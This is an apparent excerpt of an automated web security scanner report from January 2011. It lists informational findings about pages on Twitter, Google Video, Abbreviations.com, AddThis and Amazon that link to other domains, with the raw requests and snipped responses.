<a href="/ChefGuyFieri" class="avatar" hreflang="en" target="_blank"><img alt="ChefGuyFieri" border="0" height="48" src="http://a1.twimg.com/profile_images/112254859/GuyFieri_photo1_white_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/Arsenal" class="avatar-sm" hreflang="en" id="icon_Arsenal" rel="Arsenal" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/952444947/twitter_logo_bigger.gif_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/Arsenal" class="avatar" hreflang="en" target="_blank"><img alt="Arsenal" border="0" height="48" src="http://a1.twimg.com/profile_images/952444947/twitter_logo_bigger.gif_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/CobraCommander" class="avatar-sm" hreflang="en" id="icon_CobraCommander" rel="CobraCommander" target="_blank"><img alt="" border="0" height="48" src="http://a0.twimg.com/profile_images/53798835/snake_cobra_commander_normal.gif" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/CobraCommander" class="avatar" hreflang="en" target="_blank"><img alt="CobraCommander" border="0" height="48" src="http://a0.twimg.com/profile_images/53798835/snake_cobra_commander_normal.gif" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/WSJ_Econ" class="avatar-sm" hreflang="en" id="icon_WSJ_Econ" rel="WSJ_Econ" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/117655834/twitter_blog_realtimeecon_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/WSJ_Econ" class="avatar" hreflang="en" target="_blank"><img alt="WSJ_Econ" border="0" height="48" src="http://a2.twimg.com/profile_images/117655834/twitter_blog_realtimeecon_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/feedback" class="avatar-sm" hreflang="en" id="icon_feedback" rel="feedback" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/818033855/Picture_3_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/feedback" class="avatar" hreflang="en" target="_blank"><img alt="feedback" border="0" height="48" src="http://a2.twimg.com/profile_images/818033855/Picture_3_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/jdickerson" class="avatar-sm" hreflang="en" id="icon_jdickerson" rel="jdickerson" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/49246432/jdmisha_small_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/jdickerson" class="avatar" hreflang="en" target="_blank"><img alt="jdickerson" border="0" height="48" src="http://a2.twimg.com/profile_images/49246432/jdmisha_small_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
</h2>

<script src="http://a2.twimg.com/a/1295646587/javascripts/widgets/widget.js?1295901448" type="text/javascript"></script>
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

20.538. http://twitter.com/share

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /share

Issue detail

The page was loaded from a URL containing a query string:
  • http://twitter.com/share?url=
The response contains the following links to other domains:
  • http://s.twimg.com/images/favicon.ico
  • http://yui.yahooapis.com/3.1.1/build/cssfonts/fonts-min.css

Request

GET /share?url= HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 403 Forbidden
Date: Mon, 24 Jan 2011 23:08:27 GMT
Server: hi
Status: 403 Forbidden
X-Transaction: 1295910507-68882-55229
Last-Modified: Mon, 24 Jan 2011 23:08:27 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4792
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910505558956; path=/; expires=Mon, 31-Jan-11 23:08:25 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591050734535652; path=/; expires=Wed, 23 Feb 2011 23:08:27 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWYzZjBhYmFhMmYzYTI2MWNmZjY2NmQ3Njc2ZmYxNWQwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIUhNJui0B--90f25d6b5108d9cf282a164d534e4ac3af8b2a9b; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>

<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Content-Language" content="en-us" />
<title>Twitter / Valid URL par
...[SNIP]...
</title>
<link href="http://s.twimg.com/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link rel="stylesheet" href="http://yui.yahooapis.com/3.1.1/build/cssfonts/fonts-min.css" type="text/css" charset="utf-8">

<style type="text/css" media="screen">
...[SNIP]...

20.539. http://video.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.google.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
  • http://video.google.com/?hl=en&tab=wv
The response contains the following links to other domains:
  • http://googlevideo.blogspot.com/
  • http://www.youtube.com/?hl=en&tab=v1

Request

GET /?hl=en&tab=wv HTTP/1.1
Host: video.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 16:02:43 GMT
Expires: Mon, 24 Jan 2011 16:02:43 GMT
Cache-Control: private, max-age=0
Set-Cookie: PREF=ID=470ac884b6ec430a:TM=1295884963:LM=1295884963:S=y89enf5jPoxriQRu; expires=Wed, 23-Jan-2013 16:02:43 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html>
<meta content="text/html; charset=UTF-8" http-equiv=content-type>
<meta content="Search millions of videos from across the web." name=description>
<title>Google Videos</title>
<script>
...[SNIP]...
</div><a class=gb2 href=http://www.youtube.com/?hl=en&tab=v1 onclick=gbar.qs(this)>YouTube</a>
...[SNIP]...
<div class=div-footer>
<a href=http://googlevideo.blogspot.com/>Blog</a>
...[SNIP]...

20.540. http://www.abbreviations.com/bs2.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs2.aspx

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.abbreviations.com/bs2.aspx?st=
The response contains the following links to other domains:
  • http://addthis.com/bookmark.php?v=250&username=dejango
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://twitter.com/justadded
  • http://uac.advertising.com/wrapper/aceUAC.js
  • http://www.convert.net/
  • http://www.definitions.net/
  • http://www.facebook.com/pages/STANDS4/135790749786167
  • http://www.google-analytics.com/urchin.js
  • http://www.lyrics.net/
  • http://www.phrases.net/
  • http://www.quotes.net/
  • http://www.references.net/
  • http://www.rhymes.net/
  • http://www.synonyms.net/
  • http://www.uszip.com/

Request

GET /bs2.aspx?st= HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:13:29 GMT
Connection: close
Content-Length: 25727


<title>What does&nbsp;&nbsp;stand for?</title>

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-positio
...[SNIP]...
<link rel="stylesheet" type="text/css" href="abbr.css" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<td><a href="http://www.convert.net"><img border="0" src="http://www.abbreviations.com/images/con-off.jpg" alt="Convert.net" onmouseover="this.src='http://www.abbreviations.com/images/con-on.jpg'" onmouseout="this.src='http://www.abbrevia
...[SNIP]...
<td><a href="http://www.definitions.net"><img border="0" src="http://www.abbreviations.com/images/def-off.jpg" alt="Definitions.net" onmouseover="this.src='http://www.abbreviations.com/images/def-on.jpg'" onmouseout="this.src='http://www.abbr
...[SNIP]...
<td><a href="http://www.lyrics.net"><img border="0" src="http://www.abbreviations.com/images/lyr-off.jpg" alt="Lyrics.net" onmouseover="this.src='http://www.abbreviations.com/images/lyr-on.jpg'" onmouseout="this.src='http://www.abbreviat
...[SNIP]...
<td><a href="http://www.phrases.net"><img border="0" src="http://www.abbreviations.com/images/phr-off.jpg" alt="Phrases.net" onmouseover="this.src='http://www.abbreviations.com/images/phr-on.jpg'" onmouseout="this.src='http://www.abbrevia
...[SNIP]...
<td><a href="http://www.quotes.net"><img border="0" src="http://www.abbreviations.com/images/quo-off.jpg" alt="Quotes.net" onmouseover="this.src='http://www.abbreviations.com/images/quo-on.jpg'" onmouseout="this.src='http://www.abbreviat
...[SNIP]...
<td><a href="http://www.references.net"><img border="0" alt="References.net" src="http://www.abbreviations.com/images/ref-off.jpg" onmouseover="this.src='http://www.abbreviations.com/images/ref-on.jpg'" onmouseout="this.src='http://www.abbr
...[SNIP]...
<td><a href="http://www.rhymes.net"><img border="0" alt="Rhymes.net" src="http://www.abbreviations.com/images/rhy-off.jpg" onmouseover="this.src='http://www.abbreviations.com/images/rhy-on.jpg'" onmouseout="this.src='http://www.abbreviat
...[SNIP]...
<td><a href="http://www.synonyms.net"><img border="0" src="http://www.abbreviations.com/images/syn-off.jpg" alt="Synonyms.net" onmouseover="this.src='http://www.abbreviations.com/images/syn-on.jpg'" onmouseout="this.src='http://www.abbrevi
...[SNIP]...
<td><a href="http://www.uszip.com"><img border="0" alt="USZip.com" src="http://www.abbreviations.com/images/zip-off.jpg" onmouseover="this.src='http://www.abbreviations.com/images/zip-on.jpg'" onmouseout="this.src='http://www.abbreviati
...[SNIP]...
<td width="100%" align="center">&nbsp;<a class="addthis_button" href="http://addthis.com/bookmark.php?v=250&amp;username=dejango"><img src="http://www.abbreviations.com/images/b.png" alt="Bookmark and Share" style="border:0;vertical-align:-3px;"></a><script " src="http://s7.addthis.com/js/250/addthis_widget.js#username=dejango"></script>
...[SNIP]...
</script>
           <script type="text/javascript"
            src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

           </script>
...[SNIP]...
</script>
           <script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
...[SNIP]...
<span style="vertical-align:-3px;"><a href="http://www.facebook.com/pages/STANDS4/135790749786167"><img alt="Follow us on Facebook!" src="http://www.abbreviations.com/images/f.gif">
...[SNIP]...
<span style="vertical-align:-3px;"><a href="http://twitter.com/justadded"><img alt="Follow us on Twitter!" src="http://www.abbreviations.com/images/t.gif">
...[SNIP]...

20.541. http://www.abbreviations.com/searchAmazon.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchAmazon.aspx

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.abbreviations.com/searchAmazon.aspx?st=
The response contains the following links to other domains:
  • http://addthis.com/bookmark.php?v=250&username=dejango
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://twitter.com/justadded
  • http://uac.advertising.com/wrapper/aceUAC.js
  • http://www.convert.net/
  • http://www.definitions.net/
  • http://www.facebook.com/pages/STANDS4/135790749786167
  • http://www.google-analytics.com/urchin.js
  • http://www.lyrics.net/
  • http://www.phrases.net/
  • http://www.quotes.net/
  • http://www.references.net/
  • http://www.rhymes.net/
  • http://www.synonyms.net/
  • http://www.uszip.com/

Request

GET /searchAmazon.aspx?st= HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:20:21 GMT
Connection: close
Content-Length: 26561

<html>

<head>
<title>Amazon Search Results</title>
<style><!--
.ctgp {padding:0px 10px 0px 0px;}
.ctgp a, .ctgp a:visited {color:#000000;}
.ctgp a:hover {color:#990000;}

.resp {padding:0px;
...[SNIP]...
<link rel="stylesheet" type="text/css" href="abbr.css" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<td><a href="http://www.convert.net"><img border="0" src="http://www.abbreviations.com/images/con-off.jpg" alt="Convert.net" onmouseover="this.src='http://www.abbreviations.com/images/con-on.jpg'" onmouseout="this.src='http://www.abbrevia
...[SNIP]...
<td><a href="http://www.definitions.net"><img border="0" src="http://www.abbreviations.com/images/def-off.jpg" alt="Definitions.net" onmouseover="this.src='http://www.abbreviations.com/images/def-on.jpg'" onmouseout="this.src='http://www.abbr
...[SNIP]...
<td><a href="http://www.lyrics.net"><img border="0" src="http://www.abbreviations.com/images/lyr-off.jpg" alt="Lyrics.net" onmouseover="this.src='http://www.abbreviations.com/images/lyr-on.jpg'" onmouseout="this.src='http://www.abbreviat
...[SNIP]...
<td><a href="http://www.phrases.net"><img border="0" src="http://www.abbreviations.com/images/phr-off.jpg" alt="Phrases.net" onmouseover="this.src='http://www.abbreviations.com/images/phr-on.jpg'" onmouseout="this.src='http://www.abbrevia
...[SNIP]...
<td><a href="http://www.quotes.net"><img border="0" src="http://www.abbreviations.com/images/quo-off.jpg" alt="Quotes.net" onmouseover="this.src='http://www.abbreviations.com/images/quo-on.jpg'" onmouseout="this.src='http://www.abbreviat
...[SNIP]...
<td><a href="http://www.references.net"><img border="0" alt="References.net" src="http://www.abbreviations.com/images/ref-off.jpg" onmouseover="this.src='http://www.abbreviations.com/images/ref-on.jpg'" onmouseout="this.src='http://www.abbr
...[SNIP]...
<td><a href="http://www.rhymes.net"><img border="0" alt="Rhymes.net" src="http://www.abbreviations.com/images/rhy-off.jpg" onmouseover="this.src='http://www.abbreviations.com/images/rhy-on.jpg'" onmouseout="this.src='http://www.abbreviat
...[SNIP]...
<td><a href="http://www.synonyms.net"><img border="0" src="http://www.abbreviations.com/images/syn-off.jpg" alt="Synonyms.net" onmouseover="this.src='http://www.abbreviations.com/images/syn-on.jpg'" onmouseout="this.src='http://www.abbrevi
...[SNIP]...
<td><a href="http://www.uszip.com"><img border="0" alt="USZip.com" src="http://www.abbreviations.com/images/zip-off.jpg" onmouseover="this.src='http://www.abbreviations.com/images/zip-on.jpg'" onmouseout="this.src='http://www.abbreviati
...[SNIP]...
<td width="100%" align="center">&nbsp;<a class="addthis_button" href="http://addthis.com/bookmark.php?v=250&amp;username=dejango"><img src="http://www.abbreviations.com/images/b.png" alt="Bookmark and Share" style="border:0;vertical-align:-3px;"></a><script " src="http://s7.addthis.com/js/250/addthis_widget.js#username=dejango"></script>
...[SNIP]...
</script>
           <script type="text/javascript"
            src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

           </script>
...[SNIP]...
</script>
           <script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
...[SNIP]...
<span style="vertical-align:-3px;"><a href="http://www.facebook.com/pages/STANDS4/135790749786167"><img alt="Follow us on Facebook!" src="http://www.abbreviations.com/images/f.gif">
...[SNIP]...
<span style="vertical-align:-3px;"><a href="http://twitter.com/justadded"><img alt="Follow us on Twitter!" src="http://www.abbreviations.com/images/t.gif">
...[SNIP]...

20.542. http://www.addthis.com/bookmark.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.addthis.com/bookmark.php?wt=nw&pub=sistergoldenhair&url=
The response contains the following links to other domains:
  • http://cache.addthiscdn.com/www/q0197/js/bookmark.js
  • http://cache.addthiscdn.com/www/q0197/style/bookmark.css

Request

GET /bookmark.php?wt=nw&pub=sistergoldenhair&url= HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:03:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 92428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<link rel="canonical" href="http://www.addthis.com/bookmark.php" />
<link href="//cache.addthiscdn.com/www/q0197/style/bookmark.css" rel="stylesheet" type="text/css" />
<style type="text/css" media="only screen and (device-width: 768px)" />
...[SNIP]...
</style>
<script type="text/javascript" src="//cache.addthiscdn.com/www/q0197/js/bookmark.js"></script>
...[SNIP]...

20.543. http://www.addthis.com/feed.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /feed.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.addthis.com/feed.php?pub=kicko&h1=http%3A%2F%2Fwww.x64bitdownload.com%2Frss%2Fdownloads.xml&t1=
The response contains the following links to other domains:
  • http://cache.addthiscdn.com/www/q0197/images/addthis-logo.gif
  • http://cache.addthiscdn.com/www/q0197/style/old-styles.css
  • http://www.x64bitdownload.com/rss/downloads.xml

Request

GET /feed.php?pub=kicko&h1=http%3A%2F%2Fwww.x64bitdownload.com%2Frss%2Fdownloads.xml&t1= HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: pub=kicko; expires=Sat, 23-Jul-2011 16:03:20 GMT; path=/
Vary: Accept-Encoding
Content-Length: 7846
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
</title>
<link href="//cache.addthiscdn.com/www/q0197/style/old-styles.css" rel="stylesheet" type="text/css" />

<script type="text/javascript">
...[SNIP]...
<td><img src="//cache.addthiscdn.com/www/q0197/images/addthis-logo.gif" width="260" height="32" /></td>
...[SNIP]...
put name="h1" type="hidden" value="http://www.x64bitdownload.com/rss/downloads.xml" checked="checked" /> 64 bit download - freeware, shareware - X 64-bit Download
X 64-bit Download logo
<a href="http://www.x64bitdownload.com/rss/downloads.xml" target="_blank">[view xml]</a>
...[SNIP]...

20.544. http://www.amazon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.amazon.com/?&tag=parenthoodcom-20&camp=211493&creative=379969&linkCode=op1&adid=0GZGV3PX406SYA9DGF7Q&
The response contains the following links to other domains:
  • http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.MSIE.xml
  • http://ecx.images-amazon.com/images/I/417XQ0XwQuL._SL135_.jpg
  • http://ecx.images-amazon.com/images/I/41cnkm6rkhL._SL135_.jpg
  • http://ecx.images-amazon.com/images/I/51KP1RAWnrL._SL135_.jpg
  • http://g-ecx.images-amazon.com/images/G/01/amazon-credit/consumer/visa_gateway_300_4._V192208236_.gif
  • http://g-ecx.images-amazon.com/images/G/01/camera/gw/camera-3dcams_300x75._V172108031_.jpg
  • http://g-ecx.images-amazon.com/images/G/01/electronics/detail-page/asus-2._V189604747_.gif
  • http://g-ecx.images-amazon.com/images/G/01/electronics/detail-page/asus._V189604750_.gif
  • http://g-ecx.images-amazon.com/images/G/01/electronics/detail-page/dell._V189604740_.gif
  • http://g-ecx.images-amazon.com/images/G/01/gateway/visit_amazon_ca_tcg._V229026943_.gif
  • http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif
  • http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16._V212310439_.png
  • http://g-ecx.images-amazon.com/images/G/01/img10/software/300-column/turbo_tax_2010_300x120._V196727518_.jpg
  • http://g-ecx.images-amazon.com/images/G/01/kindle/merch/gw/shasta/shasta-gw-bestselling-475x275._V172146981_.jpg
  • http://g-ecx.images-amazon.com/images/G/01/watches/B000EQR6H0._V192598437_.jpg
  • http://g-ecx.images-amazon.com/images/G/01/watches/B0019FP47E._V192598089_.jpg
  • http://g-ecx.images-amazon.com/images/G/01/watches/B001A62M04._V192212155_.jpg
  • http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
  • http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V42752373_.gif
  • http://www.amazon.ca/
  • http://www.amazon.cn/
  • http://www.amazon.de/
  • http://www.amazon.fr/
  • http://www.amazon.it/
  • http://www.audible.com/
  • http://www.dpreview.com/
  • http://www.endless.com/
  • http://www.fabric.com/
  • http://www.imdb.com/
  • http://www.shopbop.com/welcome
  • http://www.smallparts.com/
  • http://www.warehousedeals.com/
  • http://www.woot.com/
  • http://www.zappos.com/
  • http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-10089555225.js._V173906659_.js
  • http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5791285623.css._V173906657_.css
  • http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/websiteGridCSS/websiteGridCSS-websiteGridCSS-8253._V186639940_.css
  • http://z-ecx.images-amazon.com/images/G/01/s9-campaigns/s9-widget-seeded._V172999743_.css
  • http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif

Request

GET /?&tag=parenthoodcom-20&camp=211493&creative=379969&linkCode=op1&adid=0GZGV3PX406SYA9DGF7Q& HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:22 GMT
Server: Server
Set-Cookie: skin=noskin; path=/; domain=.amazon.com; expires=Tue, 25-Jan-2011 14:04:22 GMT
x-amz-id-1: 0CE2668WXXDSQR5PR7PV
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: s6OPjR2rj38YhI1zC2U1O/3MBqGcZuTSin8FL9WLITyJjhgwIud/Qst9vXPfPjMk
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=184-5651957-6603505; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 133382


<html>
<head>


<style type="text/css"><!--


BODY { font-family: verdana,arial,helvetica,sans-serif; font-size: x-small; background-color: #FF
...[SNIP]...
</script>


<link title="Amazon Search Suggestions" rel="search" type="application/opensearchdescription+xml" href="http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.MSIE.xml">


<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
...[SNIP]...
</title>


<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5791285623.css._V173906657_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/websiteGridCSS/websiteGridCSS-websiteGridCSS-8253._V186639940_.css' rel='stylesheet'>
<style type="text/css">
...[SNIP]...
</script>
<img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16._V212310439_.png" style="display:none" alt=""/>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" style="display:none" alt=""/>


<!--Pilu -->
...[SNIP]...
<div id="navSaGwBody" class="navSaNonJs">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" height="1" width="173" class="navSaGwForceWidth" alt=""/>
<script type="text/javascript">
...[SNIP]...
</map><img src="http://g-ecx.images-amazon.com/images/G/01/camera/gw/camera-3dcams_300x75._V172108031_.jpg" width="300" align="center" usemap="#CE-0800_3D_GW" alt="3D Cameras and Camcorders" height="75" border="0" /></td>
...[SNIP]...
Dlpo%255Fixgwamuscaen-21&token=AD297DDA0F9D6C887976CD08894B02DB57139A39&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-intl-crossover-0&pf_rd_r=0CE2668WXXDSQR5PR7PV&pf_rd_t=101&pf_rd_p=499834531&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/gateway/visit_amazon_ca_tcg._V229026943_.gif" align="center" alt="Shop at Amazon.ca" border="0" /></a>
...[SNIP]...
</map><img src="http://g-ecx.images-amazon.com/images/G/01/kindle/merch/gw/shasta/shasta-gw-bestselling-475x275._V172146981_.jpg" width="475" align="center" usemap="#kindleC2" alt="Kindle, the #1 Bestselling Product on Amazon" height="275" border="0" /></td>
...[SNIP]...
<div class="amabot_center" id="centercol">


<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" style="display:block" alt="" width="1" id="ATFMarker" onload="if (typeof uet == 'function') { uet('af'); } var gwatfcol = document.getElementById('center1'); if (gwatfcol == null) { gwatfcol = document.getElementById('centercol'); } if (gwatfcol != null) { var gwatfcolimg = gwatfcol.getElementsByTagName('img'); if (gwatfcolimg != null) { registerCSMEvent('cf', gwatfcolimg); } } for (var i=0;i<gwEH._f.length;i++) { try { gwEH._f[i](); } catch (e) {} } gwEH.afterFold = function(callback) { callback(); }"/>


<script type="text/javascript">
...[SNIP]...
</script>

<script type="text/javascript" src="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-10089555225.js._V173906659_.js"></script>
...[SNIP]...
</script>


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/s9-campaigns/s9-widget-seeded._V172999743_.css"/><div class="unified_widget rcm widget small_heading">
...[SNIP]...
<div class="imageContainer"><img src="http://ecx.images-amazon.com/images/I/417XQ0XwQuL._SL135_.jpg" alt="" width="135" height="135" id="ns_0CE2668WXXDSQR5PR7PV_5525_r0Image0" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://ecx.images-amazon.com/images/I/51KP1RAWnrL._SL135_.jpg" alt="" width="87" height="135" id="ns_0CE2668WXXDSQR5PR7PV_5525_r0Image1" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://ecx.images-amazon.com/images/I/41cnkm6rkhL._SL135_.jpg" alt="" width="113" height="135" id="ns_0CE2668WXXDSQR5PR7PV_5525_r0Image2" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" url="http://ecx.images-amazon.com/images/I/51pOdwD35SL._SL135_.jpg" alt="" width="135" height="135" id="ns_0CE2668WXXDSQR5PR7PV_5525_r0Image3" /></div>
...[SNIP]...
=B004IRUFR4&amp;DownloadLocation=SEARCH" onclick="return ns_0CE2668WXXDSQR5PR7PV_5525__S9MusicPlayer.trackPreviewPressed('B004IRUFR4');" style="width: 135px; position: absolute; top: 108px; left: 0;">
<img id="ns_0CE2668WXXDSQR5PR7PV_5525_trackPreviewB004IRUFR4" class="s9_trackPreviewButton" align="absmiddle" width="22" height="22" border="0" title="Sample" alt="Sample" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V42752373_.gif"/>
